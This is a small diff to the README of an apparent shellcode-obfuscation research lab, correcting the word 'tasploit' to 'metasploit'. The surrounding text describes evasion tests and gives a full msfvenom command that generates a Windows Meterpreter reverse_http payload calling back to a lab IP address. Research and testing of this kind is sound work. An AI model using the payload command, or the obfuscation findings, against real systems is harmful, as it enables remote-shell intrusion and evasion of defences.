dobin/ShellcodeObfuscationLab/README.md

 Tests have been performed with einer "random" - a alphanumeric 20 byte string as "shellcode".
 And "metasploit" with output of `msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.190.134 LPORT=80 -f raw -o beacon.bin`.
-The "tasploit" does not execute the shellcode, only decodes and prints it.
+The "metasploit" does not execute the shellcode, only decodes and prints it.

 Conclusion:
 * The type of encoding/encryption doesnt matter